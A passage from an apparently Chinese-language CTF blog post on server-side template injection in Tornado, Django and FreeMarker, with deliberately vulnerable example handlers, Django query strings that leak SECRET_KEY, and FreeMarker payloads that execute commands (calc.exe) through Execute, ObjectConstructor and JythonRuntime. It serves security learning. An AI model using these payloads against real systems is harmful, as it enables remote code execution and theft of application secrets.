<p><a target="_blank" rel="noopener" href="https://github.com/epinna/tplmap">GitHub - epinna&#x2F;tplmap: Server-Side Template Injection and Code Injection Detection and Exploitation Tool</a></p>
<p>这里推荐自动化工具tplmap，拿shell、执行命令、bind_shell、反弹shell、上传下载文件，Tplmap为SSTI的利用提供了很大的便利</p>
</blockquote>
<h3 id="Tornado"><a href="#Tornado" class="headerlink" title="Tornado"></a>Tornado</h3><p>tornado render是python中的一个渲染函数，也就是一种模板，通过调用的参数不同，生成不同的网页，如果用户对render内容可控，不仅可以注入XSS代码，而且还可以通过<code>&#123;&#123;&#125;&#125;</code>进行传递变量和执行简单的表达式。</p>
<p>以下代码将定义一个TEMPLATE变量作为一个模板文件，然后使用传入的name替换模板中的”FOO”，在进行加载模板并输出，且未对name值进行安全检查输入情况。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> tornado.template<br><span class="hljs-keyword">import</span> tornado.ioloop<br><span class="hljs-keyword">import</span> tornado.web<br>TEMPLATE = <span class="hljs-string">&#x27;&#x27;&#x27;</span><br><span class="hljs-string">&lt;html&gt;</span><br><span class="hljs-string"> &lt;head&gt;&lt;title&gt; Hello &#123;&#123; name &#125;&#125; &lt;/title&gt;&lt;/head&gt;</span><br><span class="hljs-string"> &lt;body&gt; Hello max &lt;/body&gt;</span><br><span class="hljs-string">&lt;/html&gt;</span><br><span class="hljs-string">&#x27;&#x27;&#x27;</span><br><span class="hljs-keyword">class</span> <span class="hljs-title class_">MainHandler</span>(tornado.web.RequestHandler):<br><br>    <span class="hljs-keyword">def</span> <span class="hljs-title function_">get</span>(<span class="hljs-params">self</span>):<br>        name = self.get_argument(<span class="hljs-string">&#x27;name&#x27;</span>, <span class="hljs-string">&#x27;&#x27;</span>)<br>        template_data = TEMPLATE.replace(<span class="hljs-string">&quot;FOO&quot;</span>,name)<br>        t = tornado.template.Template(template_data)<br>        self.write(t.generate(name=name))<br><br>application = tornado.web.Application([(<span class="hljs-string">r&quot;/&quot;</span>, MainHandler),], debug=<span class="hljs-literal">True</span>, static_path=<span class="hljs-literal">None</span>, template_path=<span class="hljs-literal">None</span>)<br><br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">&#x27;__main__&#x27;</span>:<br>    application.listen(<span class="hljs-number">8000</span>)<br>    tornado.ioloop.IOLoop.instance().start()<br></code></pre></td></tr></table></figure>

<p>在tornado模板中，存在一些可以访问的快速对象，比如 <code>&#123;&#123;escape(handler.settings["cookie"])&#125;&#125;</code>，这个其实就是<code>handler.settings</code>对象，里面存储着一些环境变量。</p>
<h3 id="Django"><a href="#Django" class="headerlink" title="Django"></a>Django</h3><p>Django的漏洞代码：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">def</span> <span class="hljs-title function_">view</span>(<span class="hljs-params">request, *args, **kwargs</span>):<br>    template = <span class="hljs-string">&#x27;Hello &#123;user&#125;, This is your email: &#x27;</span> + request.GET.get(<span class="hljs-string">&#x27;email&#x27;</span>)<br>    <span class="hljs-keyword">return</span> HttpResponse(template.<span class="hljs-built_in">format</span>(user=request.user))<br></code></pre></td></tr></table></figure>

<p>很明显 email 就是注入点，但是条件被限制的很死，很难执行命令，现在拿到的只有有一个和user有关的变量<code>request.user</code> ，这个时候我们就应该在没有应用源码的情况下去寻找框架本身的属性，看这个空框架有什么属性和类之间的引用。</p>
<p>后来发现Django自带的应用 “admin”（也就是Django自带的后台）的<code>models.py</code>中导入了当前网站的配置文件：</p>
<p><img src="https://picgo-1307028727.cos.ap-chengdu.myqcloud.com/picgo/1344396-20200911002243408-1781833415.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>所以可以通过某种方式，找到Django默认应用admin的model，再通过这个model获取settings对象，进而获取数据库账号密码、Web加密密钥等信息。</p>
<figure class="highlight roboconf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs roboconf">http://localhost:8000/?email=&#123;<span class="hljs-attribute">user.groups.model._meta.app_config.module.admin.settings.SECRET_KEY&#125;</span><br><span class="hljs-attribute"></span><br><span class="hljs-attribute">http</span>://localhost:8000/?email=&#123;user<span class="hljs-variable">.user_permissions</span><span class="hljs-variable">.model</span><span class="hljs-variable">._meta</span><span class="hljs-variable">.app_config</span><span class="hljs-variable">.module</span><span class="hljs-variable">.admin</span><span class="hljs-variable">.settings</span><span class="hljs-variable">.SECRET_KEY</span>&#125;<br></code></pre></td></tr></table></figure>



<h2 id="Java中的SSTI"><a href="#Java中的SSTI" class="headerlink" title="Java中的SSTI"></a>Java中的SSTI</h2><p>java常见的引擎：</p>
<ul>
<li>FreeMarker</li>
<li>velocity</li>
</ul>
<h3 id="FreeMarker"><a href="#FreeMarker" class="headerlink" title="FreeMarker"></a>FreeMarker</h3><p>FreeMarker 是一款模板引擎：即一种基于模板和要改变的数据， 并用来生成输出文本(HTML网页，电子邮件，配置文件，源代码等)的通用工具。 它不是面向最终用户的，而是一个Java类库，是一款程序员可以嵌入他们所开发产品的组件。</p>
<p><img src="https://picgo-1307028727.cos.ap-chengdu.myqcloud.com/picgo/1344396-20200909230452926-1382441572.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p><strong>FreeMarker模板代码</strong>：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs html"><span class="hljs-tag">&lt;<span class="hljs-name">html</span>&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">head</span>&gt;</span><br>  <span class="hljs-tag">&lt;<span class="hljs-name">title</span>&gt;</span>Welcome!<span class="hljs-tag">&lt;/<span class="hljs-name">title</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">head</span>&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">body</span>&gt;</span>　&lt;#–这是注释–&gt;<br>  <span class="hljs-tag">&lt;<span class="hljs-name">h1</span>&gt;</span>Welcome $&#123;user&#125;!<span class="hljs-tag">&lt;/<span class="hljs-name">h1</span>&gt;</span><br>  <span class="hljs-tag">&lt;<span class="hljs-name">p</span>&gt;</span>Our latest product:<br>  <span class="hljs-tag">&lt;<span class="hljs-name">a</span> <span class="hljs-attr">href</span>=<span class="hljs-string">&quot;$&#123;latestProduct.url&#125;&quot;</span>&gt;</span>$&#123;latestProduct.name&#125;<span class="hljs-tag">&lt;/<span class="hljs-name">a</span>&gt;</span>!<br><span class="hljs-tag">&lt;/<span class="hljs-name">body</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">html</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p>模板文件存放在Web服务器上，就像通常存放静态HTML页面那样。当有人来访问这个页面， FreeMarker将会介入执行，然后动态转换模板，用最新的数据内容替换模板中 <code>$&#123;...&#125;</code> 的部分， 之后将结果发送到访问者的Web浏览器中。</p>
<p>这个模板主要用于 java ，用户可以通过实现 <code>TemplateModel</code> 来用 <code>new</code> 创建任意 Java 对象</p>
<p>主要的用法如下：</p>
<figure class="highlight lasso"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs lasso">&lt;＃ - 创建一个用户定义的指令，调用类的参数构造函数 - &gt;<br>&lt;#assign word_wrapp =<span class="hljs-string">&quot;com.acmee.freemarker.WordWrapperDirective&quot;</span>?<span class="hljs-literal">new</span>（）&gt;<br>&lt;＃ - 创建一个用户定义的指令，用一个数字参数调用构造函数 - &gt;<br>&lt;#assign word_wrapp_narrow =<span class="hljs-string">&quot;com.acmee.freemarker.WordWrapperDirective&quot;</span>?<span class="hljs-literal">new</span>（<span class="hljs-number">40</span>）&gt;<br></code></pre></td></tr></table></figure>

<p>调用了构造函数创建了一个对象，那么这个 payload 中就是调用的 freemarker 的内置执行命令的对象 <code>Execute</code>。</p>
<p><code>freemarker.template.utility</code> 里面有个<code>Execute</code>类，这个类会执行它的参数，因此我们可以利用<code>new</code>函数新建一个<code>Execute</code>类，传输我们要执行的命令作为参数，从而构造远程命令执行漏洞。构造payload：</p>
<figure class="highlight gams"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs gams">&lt;#<span class="hljs-keyword">assign</span> value=<span class="hljs-string">&quot;freemarker.template.utility.Execute&quot;</span>?new()&gt;<span class="hljs-symbol">$</span>&#123;value(<span class="hljs-string">&quot;calc.exe&quot;</span>)&#125;<br></code></pre></td></tr></table></figure>

<p><code>freemarker.template.utility</code> 里面有个<code>ObjectConstructor</code>类，如下图所示，这个类会把它的参数作为名称，构造了一个实例化对象。因此我们可以构造一个可执行命令的对象，从而构造远程命令执行漏洞：</p>
<figure class="highlight gams"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs gams">&lt;#<span class="hljs-keyword">assign</span> value=<span class="hljs-string">&quot;freemarker.template.utility.ObjectConstructor&quot;</span>?new()&gt;<span class="hljs-symbol">$</span>&#123;value(<span class="hljs-string">&quot;java.lang.ProcessBuilder&quot;</span>,<span class="hljs-string">&quot;calc.exe&quot;</span>).start()<br></code></pre></td></tr></table></figure>

<p><code>freemarker.template.utility</code> 里面的<code>JythonRuntime</code>，可以通过自定义标签的方式，执行Python命令，从而构造远程命令执行漏洞。</p>
<figure class="highlight moonscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs moonscript">&lt;#assign value=<span class="hljs-string">&quot;freemarker.template.utility.JythonRuntime&quot;</span>?new()&gt;&lt;@value&gt;<span class="hljs-keyword">import</span> <span class="hljs-built_in">os</span>;<span class="hljs-built_in">os</span>.system(<span class="hljs-string">&quot;calc.exe&quot;</span>)&lt;/@value&gt;<br><br></code></pre></td></tr></table></figure>

<blockquote>
<p><a target="_blank" rel="noopener" href="https://github.com/hellokoding/springboot-freemarker">GitHub - hellokoding&#x2F;springboot-freemarker: Spring Boot Hello World Example with FreeMarker</a></p>
<p>一个freemaker示例可用于测试。</p>
</blockquote>
<h3 id="velocity"><a href="#velocity" class="headerlink" title="velocity"></a>velocity</h3><blockquote>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/8135">CVE-2019-3396 Confluence Velocity SSTI漏洞浅析 - 先知社区 (aliyun.com)</a></p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/7466">白头搔更短，SSTI惹人心！ - 先知社区 (aliyun.com)</a></p>
</blockquote>
<p>Apache Velocity是一个基于Java的模板引擎，它提供了一个模板语言去引用由Java代码定义的对象。Velocity是Apache基金会旗下的一个开源软件项目，旨在确保Web应用程序在表示层和业务逻辑层之间的隔离（即MVC设计模式）。</p>
<p>使用Velocity主要流程为：</p>
<ul>
<li>初始化Velocity模板引擎，包括模板路径、加载类型等</li>
<li>创建用于存储预传递到模板文件的数据的上下文</li>
<li>选择具体的模板文件，传递数据完成渲染</li>
</ul>
<h2 id="CTF题目"><a href="#CTF题目" class="headerlink" title="CTF题目"></a>CTF题目</h2><h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/3679">flask之ssti模版注入从零到入门 - 先知社区 (aliyun.com)</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/chalan630/p/12578418.html">SSTI(模板注入) - chalan630 - 博客园 (cnblogs.com)</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/zz_Caleb/article/details/96480967">SSTI完全学习_大千SS的博客-CSDN博客_ssti</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/20175211lyz/p/11425368.html">CTF SSTI(服务器模板注入) - MustaphaMond - 博客园 (cnblogs.com)</a></p>
<p><a target="_blank" rel="noopener" href="https://cloud.tencent.com/developer/article/1637529">Python安全之SSTI——Flask&#x2F;Jinja2 - 腾讯云开发者社区-腾讯云 (tencent.com)</a></p>
<p><a target="_blank" rel="noopener" href="https://www.k0rz3n.com/2018/11/12/%E4%B8%80%E7%AF%87%E6%96%87%E7%AB%A0%E5%B8%A6%E4%BD%A0%E7%90%86%E8%A7%A3%E6%BC%8F%E6%B4%9E%E4%B9%8BSSTI%E6%BC%8F%E6%B4%9E/">一篇文章带你理解漏洞之 SSTI 漏洞 | K0rz3n’s Blog</a></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/ctf/" class="category-chain-item">ctf</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/ctf/">#ctf</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>[ctf] ssti模板注入</div>
      <div>https://s1n9l3.github.io/2023/01/30/[ctf] ssti模板注入/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>YY</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2023年1月30日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2023/01/09/%5Bjava%5D%20mybatis%E5%AD%A6%E4%B9%A0/" title="[java] mybatis学习">
                        <span class="hidden-mobile">[java] mybatis学习</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
